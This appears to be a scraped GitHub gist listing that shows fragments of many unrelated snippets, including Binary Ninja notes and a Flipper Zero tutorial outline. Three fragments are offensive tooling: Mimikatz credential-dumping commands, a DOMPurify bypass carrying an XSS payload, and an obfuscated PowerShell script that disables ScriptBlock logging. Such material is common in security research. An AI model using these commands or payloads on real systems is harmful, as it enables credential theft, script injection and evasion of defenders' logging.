This is a work in progress by someone who is learning about Binary Ninja.
References
- https://api.binary.ninja/binaryninja.binaryview-module.html
- https://gist.github.com/psifertex/6fbc7532f536775194edd26290892ef7
Get database name
from __future__ import print_function | |
import requests | |
import base64 | |
# curl to python requests | |
# https://curl.trillworks.com/ | |
home_url = 'http://192.168.1.170/' | |
session = requests.Session() |
/** | |
LCG output... | |
lcg(1) : 40B2947B | |
lcg(2) : 73718F14 | |
lcg(3) : 6203F04B | |
lcg(4) : 1BB91A70 | |
lcg(5) : 0CFC23E0 | |
ICG output... | |
icg(5) : 0CFC23E0 |
#general | |
privilege::debug | |
log | |
log customlogfilename.log | |
#sekurlsa | |
sekurlsa::logonpasswords | |
sekurlsa::logonPasswords full |
This is a work in progress by someone who is learning about Binary Ninja.
References
Get database name
Original report
Creating a Flipper Zero app to test for this attack involves writing a script that can interact with the RFID module on the Flipper Zero to perform the necessary steps. The Flipper Zero uses a scripting language called **.fap** (Flipper App) format, typically written in C or a high-level scripting language, but it also supports custom Python-like scripting with `flipperzero-tui`. | |
Here's a basic outline for creating an app that can check for the presence of the backdoor key on a MIFARE Classic card. Note that this is a simplified version and assumes some familiarity with Flipper Zero's development environment. | |
### **Step 1: Set Up the Development Environment** | |
1. **Install Flipper Zero SDK:** | |
- Follow the official [Flipper Zero documentation](https://github.com/flipperdevices/flipperzero-firmware) to set up the SDK and development environment. | |
2. **Clone the Flipper Zero Firmware:** |
const createDOMPurify = require("dompurify"); | |
const { JSDOM } = require("jsdom"); | |
const http = require("http"); | |
const server = http.createServer((req, res) => { | |
const window = new JSDOM("").window; | |
const DOMPurify = createDOMPurify(window); | |
const clean = DOMPurify.sanitize(`<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`); | |
res.statusCode = 200; |
Microsoft purchased the software Softricity SoftGrid in 2006 and renamed it to Microsoft Application Virtualization, or App-V for short. Windows shipped with several libraries in System32 and SysWOW64 to support App-V.
One App-V library stands out from all the rest because it only has one exported function named IllBeBack
...
That's right!
A library signed by Microsoft, with Terminator
in the name, that only has a single callable function named IllBeBack
.
# ScriptBlock Logging Bypass | |
# @cobbr_io | |
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
If ($GroupPolicyField) { | |
$GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
} |
#include <stdio.h> | |
#include <assert.h> | |
#include <Windows.h> | |
// Some of them taken (and modified) from https://github.com/winsiderss/systeminformer | |
typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION | |
{ | |
BOOLEAN SecureKernelRunning : 1; | |
BOOLEAN HvciEnabled : 1; |